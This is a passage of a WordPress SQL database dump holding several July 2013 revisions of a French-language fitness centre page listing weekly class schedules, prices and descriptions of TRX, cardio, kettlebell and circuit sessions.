5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:30:27', '2013-07-03 17:30:27', '', 11, 'http://www.crosstrainingcenter.be/?p=186', 0, 'revision', '', 0),
(185, 1, '2013-07-03 17:28:40', '2013-07-03 17:28:40', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\" >MARDI</td>\r\n<td class=\"ttitreh\" >MERCREDI</td>\r\n<td class=\"ttitreh\" >JEUDI</td>\r\n<td  class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td  class=\"ttitre\">17h30</td>\r\n<td  class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:28:40', '2013-07-03 17:28:40', '', 11, 'http://www.crosstrainingcenter.be/?p=185', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(184, 1, '2013-07-03 17:24:45', '2013-07-03 17:24:45', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\" >MARDI</td>\r\n<td class=\"ttitre\" >MERCREDI</td>\r\n<td class=\"ttitre\" >JEUDI</td>\r\n<td  class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td  class=\"ttitre\">17h30</td>\r\n<td  class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td >TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:24:45', '2013-07-03 17:24:45', '', 11, 'http://www.crosstrainingcenter.be/?p=184', 0, 'revision', '', 0),
(189, 1, '2013-07-03 17:38:00', '2013-07-03 17:38:00', '<h2>Team Training :</h2>\r\n<h4>En semaine :</h4>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4>Le week-end :</h4>\r\n\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 